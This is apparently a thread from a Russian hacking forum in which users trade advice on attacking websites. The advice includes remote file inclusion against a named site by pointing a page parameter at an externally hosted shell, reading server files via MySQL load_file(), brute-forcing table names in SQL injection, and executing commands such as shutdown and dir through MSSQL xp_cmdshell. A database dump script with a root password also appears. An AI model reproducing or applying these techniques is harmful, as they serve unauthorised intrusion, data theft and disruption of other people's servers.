Если форма прежназначена для загрузки картинок, то посмотри свойства одного из изображений, в новостях например, там будет указана папка с изображениями. Наверняка и твой файл там.
Strilo4ka Спасибо, руками уже пробывал - безрезультатно, буду колдовать со сканером)) Ctacok Незнаю, изображение добавляется как скриншот в письме в саппорт о неполадке сервиса
Чем можно сдампить большую БД (12кк записей) sypex не смог На сервере можно запускать cgi скрипты. Попробовал PHP: #!/bin/sh DB=forum USER=root PASS=motynub HOST=localhost echo "Content-Type: text/plain" echo "Content-Disposition: attachment; filename=$DB.sql" echo mysqldump --opt --quick --max_allowed_packet=1M --default-character-set=utf8 -u "$USER" -p"$PASS" -h $HOST $DB Но вышел еррор 500 (safe_mode = ON)
2 InFlame чтение файлов возможно, используй load_file(). Естественно для успешного чтения юзер под которым работает бд должен иметь file_priv = Y вывод режется до 64 символов остальные символы читаем с помощью функции substr()
на Microsoft SQL Native Client error '80040e14' Unclosed quotation mark after the character string ''. /boards/boards_moderated.asp, line 19 а на идеть редирект на главную страницу. Как поступит в данном случае или просто забыть про ресурс?
Можно ли с этим как-либо шелл залить или тут просто фрейм и вообще лучше забить? Вот ссылка: http://www.pngbd.com/business/?page=http://forum.antichat.ru
есть ли возможность брутить сами имена таблицы посимвольно на 4 вертке MySQL? А то тока на 5 версии есть такое возможность
можно залей на какой нить свой сайт шелл и подаставь его типо http://www.pngbd.com/business/?page=http://site/shell.txt YuNi|[c по моему нет, можно через различные программы для sql иньекций гонять на различные базы таблиц
Попробуй запустить процесс в фоновом режиме, чтобы php не дожидался его завершения. Вообще Sypex 2.0 может перезапускать себя для работы при safe_mode=on, проверь может ты старый использовал
пробуем зайти на сайт (точнее на админку) - показывает пустую страницу (и исходный код тоже пуст). Что это за фигня? Можно как нибудь обойти?
Хех Pashkela я знаю что там нету inf_sch, вед если не знаеш префикс таблицы, то бесполезно твои гадания нас чет префиксов. Если бы было возможность брутить хотябы таблицы(не колонки) посимвольно тогда было бы супер. ЗЫ. В ступорь не вводись ты еще нужень для поддержки мега тулзы
Имею код вида Code: <?php ... $some = $_POST[some]; $s = mssql_query($some); и тут уже вывод того, что получилось. ?> Дело в том, что кавычки экранируются. Как использовать тогда exec master..xp_cmdshell ???
Большое спасибо, вроде, работает, по крайней мере машина ушла в ребут после [shutdown /f /r], но что-то не выдает результат работы запроса(допустим [dir]).
для этого тебе нужно создать таблицу в которую будешь писать вывод с помощью insert into ... execute xp_cmdshell "dir" или просто перенаправлять вывод в файл
